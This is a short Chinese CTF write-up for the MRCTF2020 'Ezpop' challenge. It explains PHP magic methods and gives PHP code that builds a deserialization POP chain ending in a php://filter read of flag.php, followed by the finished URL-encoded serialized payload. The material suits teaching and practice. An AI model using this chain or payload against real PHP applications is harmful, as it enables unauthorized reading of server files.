[MRCTF2020]Ezpop

构造简单的pop链

__invoke()  当脚本尝试将对象调用为函数时触发

__wakeup()  使用unserialize时触发，在反序列化之前。

__toString  当一个对象被当作一个字符串被调用。

__get()  用于从不可访问的属性读取数据

<?php

class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php"; //利用include读取flag.php
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
}

$pop=new Show(); //从Show类开始
$pop->source=new Show(); //从__wakeup()的echo到__toString()
$pop->source->str=new Test();//从source->str调用Test的_get()
$pop->source->str->p=new Modifier();//以p为Modifier的对象调用__invoke(),从而调用append()


echo urlencode(serialize($pop));//因为有protected属性，用urlencode绕过
?>

payload:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D